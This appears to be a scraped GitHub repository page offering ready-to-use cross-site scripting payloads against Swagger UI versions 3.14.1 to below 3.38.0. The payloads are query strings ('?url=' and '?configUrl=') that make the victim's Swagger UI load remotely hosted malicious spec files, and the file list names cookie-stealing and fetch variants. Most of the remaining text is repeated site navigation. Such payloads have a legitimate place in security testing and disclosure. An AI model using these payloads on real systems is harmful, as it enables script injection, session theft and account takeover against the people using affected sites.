Swagger UI >=3.14.1 < 3.38.0 XSS payload

Swagger UI version affected: >=3.14.1 < 3.38.0

Payloads

`url`

?url=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/xss-domain.yaml ?url=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/xss-fetch.yaml

`configUrl`

?configUrl=https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/config.json

More info at: https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-acco 5BA8 unt-takeovers/

Name		Name	Last commit message	Last commit date
Latest commit History 27 Commits
LICENSE		LICENSE
README.md		README.md
config.json		config.json
script.js		script.js
xss-cookie.yaml		xss-cookie.yaml
xss-domain.yaml		xss-domain.yaml
xss-fetch.yaml		xss-fetch.yaml
xss_img.yaml		xss_img.yaml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

Swagger UI >=3.14.1 < 3.38.0 XSS payload

Payloads

`url`

`configUrl`

About

Uh oh!

Releases

Packages

Uh oh!

Contributors 2

Uh oh!

Languages

License

VictorNS69/swagger-ui-xss

Folders and files

Latest commit

History

Repository files navigation

Swagger UI >=3.14.1 < 3.38.0 XSS payload

Payloads

url

configUrl

About

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors 2

Uh oh!

Languages

`url`

`configUrl`

Packages